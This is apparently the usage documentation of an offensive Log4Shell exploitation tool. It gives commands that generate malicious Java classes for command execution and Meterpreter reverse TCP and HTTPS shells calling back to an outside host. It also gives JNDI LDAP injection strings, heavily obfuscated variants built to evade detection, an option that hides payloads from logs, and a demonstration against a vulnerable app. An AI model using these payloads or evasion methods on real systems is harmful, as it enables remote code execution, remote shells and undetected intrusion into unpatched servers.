Execute(no output): Log4Shell.exe -gen "execute" -args "-cmd calc" -class "Test" System(with output): Log4Shell.exe -gen "system" -args "-bin cmd -args \"/c net user\"" -class "Test" ReverseTCP(java/meterpreter/reverse_tcp): // template will be open source after some time Log4Shell.exe -gen "reverse_tcp" -args "-lhost 1.1.1.1 -lport 9979" -class "Test" ReverseHTTPS(java/meterpreter/reverse_https): // template will be open source after some time Log4Shell.exe -gen "reverse_https" -args "-lhost 1.1.1.1 -lport 8443 -luri test" -class "Test" The generated class file will be saved to the payload directory(can set output flag) 

Log4Shell.exe -obf "${jndi:ldap://1.1.1.1:3890/Calc}" 

raw: ${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh} ${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:- da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:w@q.tjyo @-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.m Q:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s :-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h} Each string can only be used once, or wait 20 seconds. 

When obfuscate malicious(payload) string, log4j2 package will repeat execute it, the number of repetitions is equal the number of occurrences about string "${". The LDAP server add a simple token mechanism for prevent it. 

Log4Shell.exe -obf "${jndi:ldap://127.0.0.1:3890/Calc}" -hide 

raw: ${jndi:ldap://127.0.0.1:3890/Calc$YG=.z[.od7rH0XpE} 

Execute VulApp: E:\OneDrive\Projects\Golang\GitHub\Log4Shell\vulapp\jar>D:\Java\jdk1.8.0_121\bin\java -jar vulapp.jar ${j${0395i1-WV[nM-Pv:-nd}i${KoxnAt-KVA6T4:Xggnr:-}:${vlt0_:xTI:-}${kMe=A:QD3FK: -l}d${SaS-TmMt:-a}${uQH-oRFIXtw-4[:-}p:${XL9-bkp9k]-xz:-//}12${D@-rF@wGm:-7.0}.${Fuc:SCV6B m:-}${W1eelS:1jnUDknTJS:*7aHahf2m:vK:-0.1}${ft:4Zbf5Hf1G:Tskg:-:3}${6WH[wc:Fencc:-8}${24Y: 5h=5SqK-p(X9:-9}${oYCk6-RDIN5a$Od:U]3iOEVv:7MiEj:-0/C}${NzvB:]6T9$_O9-F.IUl-NnZq:-a}lc$YG= ${*E-5M:-.z[}${N_9@-6(l0sy-b(6.6t-y7NC*:-}${0i-4eS4kB:-.}${5WnL-LKTO554q-x[d:-od7}rH0$${oC :.XYPyzv6-sPH.]*Ls:$@Q:-XpE}} ${j${0395i1-WV[nM-Pv:-nd}i${KoxnAt-KVA6T4:Xggnr:-}:${vlt0_:xTI:-}${kMe=A:QD3FK:-l}d${SaS-T mMt:-a}${uQH-oRFIXtw-4[:-}p:${XL9-bkp9k]-xz:-//}12${D@-rF@wGm:-7.0}.${Fuc:SCV6Bm:-}${W1eel S:1jnUDknTJS:*7aHahf2m:vK:-0.1}${ft:4Zbf5Hf1G:Tskg:-:3}${6WH[wc:Fencc:-8}${24Y:5h=5SqK-p(X 9:-9}${oYCk6-RDIN5a$Od:U]3iOEVv:7MiEj:-0/C}${NzvB:]6T9$_O9-F.IUl-NnZq:-a}lc$YG=${*E-5M:-.z [}${N_9@-6(l0sy-b(6.6t-y7NC*:-}${0i-4eS4kB:-.}${5WnL-LKTO554q-x[d:-od7}rH0$${oC:.XYPyzv6-s PH.]*Ls:$@Q:-XpE}} 15:49:14.676 [main] ERROR log4j - XpE} E:\OneDrive\Projects\Golang\GitHub\Log4Shell\vulapp\jar> 

The Logger will only record a part of raw string "15:49:14.676 [main] ERROR log4j - XpE}", and repeat execute will not appear(I don't know why this happened). 

::: :::::::: :::::::: ::: :::::::: ::: ::: :::::::::: ::: ::: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +#+ +:+ :#: +#+ +:+ +#++:++#++ +#++:++#++ +#++:++# +#+ +#+ +#+ +#+ +#+ +#+ +#+# +#+#+#+#+#+ +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# ######## ######## ######## ### ######## ### ### ########## ######## ######## https://github.com/For-ACGN/Log4Shell Usage of Log4Shell.exe: -args string arguments about generate Java class file -auto-cert use ACME client to sign certificate automatically -class string specify the new class name -gen string generate Java class file with template name -hide hide obfuscated malicious(payload) string in log4j2 -host string server IP address or domain name (default "127.0.0.1") -http-addr string http server address (default ":8080") -http-net string http server network (default "tcp") -ldap-addr string ldap server address (default ":3890") -ldap-net string ldap server network (default "tcp") -no-token not add random token when use obfuscate -obf string obfuscate malicious(payload) string -output string generated Java class file output path -payload string payload(java class) directory (default "payload") -tls-cert string tls certificate file path (default "cert.pem") -tls-key string tls private key file path (default "key.pem") -tls-server enable ldaps and https server